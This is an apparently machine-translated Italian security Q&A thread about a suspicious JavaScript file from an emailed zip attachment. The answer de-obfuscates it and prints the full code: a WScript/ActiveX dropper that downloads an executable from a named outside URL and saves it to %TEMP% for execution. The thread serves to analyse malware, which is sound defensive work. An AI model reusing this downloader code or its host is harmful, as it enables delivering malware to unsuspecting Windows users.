Che cosa sta cercando di fare / sfruttare Javascript? [duplicare]

Naviga le tue risposte
1

Ho trovato il seguente javascript in un allegato .zip a un'email. (Il file zip è stato aperto su una nuova macchina virtuale KVM con nessuno dei miei dati su di esso durante l'esecuzione di una sessione di LiveCD di Ubuntu. Giusto per essere il più sicuro possibile).

link

Qualcuno può darmi un'idea di cosa sta cercando di essere portato qui?

(Ho scritto l'autore della e-mail e ho chiesto una copia del suo allegato NON in un file zip, dal momento che "molti virus sono diffusi da file zip corrotti allegati alla posta elettronica, quindi non li apriremo". vedremo cosa succede.)

    
posta Azendale 24.04.2016 - 23:12
fonte

1 risposta

3

Come primo passo, esegui il codice tramite un dispositivo di bellezza JS nel codice per eseguire l'escape.

Nota, vedrai diversi pattern come:

Fake["hostkey" ["replace"](/hostkey/, "write")]

che all'interno delle parentesi è equivalente a "hostkey".replace(/hostkey/, "write") che valuta solo "write" o Fake.write . Anche

La maggior parte dell'attività sembra essere nello script scritto concatenando un insieme di variabili (riga 124 del tuo file). Questi comandi, una volta de-offuscati un po 'sono: 

var _ = 27570,
    Keyword = "serious";
var multi_resize = 0;
var update_results = "characters_excluding_spaces",
    looks = "search_errors",
    postSelector = "f347";
Dakar = "targetParent", _actual_db_id = "deactivate_plugin", populates = 2;
e032 = "v_path_info", These = "ExpandEnvironmen";
wp_ajax_send_link_to_editor = "x00FF";
places = "tStrings", retries = "menuControl";
list = "http://dermosihhat.abdu", AuthorURI = 1,
    propertychange = "llahaktay.com/image/";
fff8e5 = "flags/.../403.php?";
triplet = "already_has_default",
    sanitize_option_ = "f=404";

textTopHei$ght = function() {
    Keyword = update_results = looks = this;
    Dakar = Keyword["WScript"];
    _actual_db_id = Dakar["CreateObject"]("WScript.Shell");
};
textTopHei$ght();
e032 = _actual_db_id[These + places]("%TEMP%/") + "5w5xGKQ9WE.exe";
try {
    this = "Reformat";
} catch (flush) {
    retries = new update_results["ActiveXObject"]("Msxml2.XMLHTTP.6.0");
}
new_branch = function() {
    retries.open("GET", "http://dermosihhat.abdullahaktay.com/image/flags/.../403.php?f=404", +multi_resize);
    retries.send();
    Dakar.Sleep(1000);
};
new_branch();
slidEvent = function() {
    postSelector = new looks["ActiveXObject"]("ADODB.Stream"));
};
slidEvent();
postSelector.open();
postSelector.type = +AuthorURI;
wp_ajax_send_link_to_editor = postSelector;
wp_ajax_send_link_to_editor.write(retries["ResponseBody"]);
wp_ajax_send_link_to_editor.position = 0;
postSelector["saveToFile"](e032, +populates);
triplet = postSelector;
triplet["close"]();

Sembra che stia facendo un sacco di cose ActiveX (che non ho familiarità con) (WScript) oltre a fare una richiesta al seguente URL dannoso ( link ) che sembra essere un binario di Windows / DOS. (Inizia con byte MZ e il testo "Questo programma non può essere eseguito in modalità DOS" vicino all'avvio.) .

Quindi sembra che si stia utilizzando ActiveX per scaricare questo eseguibile e indurti a farlo funzionare, anche se non so cosa fa l'eseguibile. (Non sono un utente di Windows e non sono sicuro di tutti i dettagli di ActiveX.)

    
risposta data 25.04.2016 - 00:17
fonte

Leggi altre domande sui tag

Quali informazioni possono essere fornite inviando un modulo online? Che cosa dobbiamo tenere a mente quando apriamo i nostri dati a terzi?